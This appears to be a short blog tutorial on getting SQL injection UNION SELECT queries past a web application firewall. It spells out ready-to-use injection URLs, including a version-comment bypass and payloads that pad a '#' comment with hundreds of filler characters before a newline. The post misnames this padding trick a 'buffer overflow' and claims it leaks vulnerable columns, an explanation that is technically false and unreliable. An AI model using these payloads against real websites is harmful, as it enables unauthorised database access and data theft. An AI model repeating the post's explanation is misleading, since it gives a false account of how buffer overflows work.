Today i am going to share with you how to By Pass Union select using Buffer overflows method.
What is Buffer Overflows::?
Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited.
------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------
How To perForm ::
when we trying To inject a Site and at the Stage of union select we fail to bypass it ...
Then we use Buffer over Flow to bypass uion select. we Send much data that can over flow the memory of site.
When Overflow occurs it leaks some important data but in in case of SQL injection it will show us Vlunerable columns.
------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------
Assume the capacity of the Memory of site is----------------------------------------------------------------------------------------------------------------------
100 Characters.....So how can we Perform over flow By sending 100+ characters..
www.site.com/php?id=1 union select 1,2,3--
WaF Detect our injection :
Lets Trying to Bypass it :
www.Site.com/php?id=1 /*!12345union*/ select 1,2,3
But this time Our Script is blocked by Hosting Team :D
------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
BY Passing Union Select By Buffer OverFlows ::
www.site.com/php?id=1 union %23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0A select 1,2,3--This time We have successfully by pass the Union select.....
-------------------------------------------------------------------------------------------------
Here We can use Any word ...Like ________ ,++++++++++,BBBBBBBBB ---
www.site.com/php?id=1 union %23+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%0A select 1,2,3-------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
:::::::::Watch on Youtube :::::::::::::::::::
Author :: Masood (Afghani)
No comments:
Post a Comment